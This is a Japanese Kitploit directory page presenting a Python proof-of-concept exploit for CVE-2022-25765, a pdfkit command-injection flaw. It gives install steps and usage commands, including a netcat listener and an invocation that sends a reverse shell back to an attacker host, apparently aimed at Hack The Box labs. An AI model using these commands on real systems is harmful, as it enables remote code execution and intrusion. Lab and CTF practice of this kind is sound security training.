Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-25765 — Python製のCVE-2022-25765向け概念実証(PoC)。pdfkitにおけるコマンドインジェクションの脆弱性で、細工されたPDF生成を介してリモートコード実行を可能にします。 | Kitploit
ツール/GitHubGitHub/innocentx0/cve-2022-25765
脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテストコマンド&コントロール学習と教育
GitHubinnocentx0/cve-2022-25765

CVE-2022-25765

Python製のCVE-2022-25765向け概念実証(PoC)。pdfkitにおけるコマンドインジェクションの脆弱性で、細工されたPDF生成を介してリモートコード実行を可能にします。

リポジトリを見る
16時間55分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-25765 — pdfkit

CVE-2022-25765 のPoC。脆弱なバージョンの pdfkit に影響します。

pdfkit 0.8.6 でテスト済みです。

要件

  • Python 3.x
  • requests
  • colorama

依存関係をインストールします:

root@kitploit:~
pip3 install -r requirements.txt

または手動で:

root@kitploit:~
pip3 install requests colorama

使用方法

root@kitploit:~
python3 exploit2.py -u <TARGET> -l <LHOST> -p <LPORT>

例: リスナーを実行します

root@kitploit:~
nc -lvnp 4242
root@kitploit:~
python3 exploit2.py -u http://10.10.10.10 -l 10.10.14.5 -p 4444

セットアップ

リポジトリをクローンします:

root@kitploit:~
git clone [email protected]:innocentx0/CVE-2022-25765.git
cd CVE-2022-25765

要件をインストールします:

root@kitploit:~
pip3 install -r requirements.txt

ラボのターゲットに対してPoCを実行します。

脆弱性

CVE-2022-25765 は、脆弱なバージョンの pdfkit におけるコマンドインジェクションの脆弱性です。

この問題は、PDF生成プロセスに渡されるユーザー制御の入力に対するサニタイズ処理が不十分であることに関連しています。

備考

このPoCは主に学習およびCTF/ラボ環境向けに作成されました。

試す場所をお探しなら、Hack The Box のマシン: Precious がおすすめです。

免責事項

これは、所有しているシステム、または明示的なテスト許可を得たシステムに対してのみ使用してください。

このプロジェクトの誤用や損害について、私は一切の責任を負いません。


INNOCENTx0

ツールをダウンロード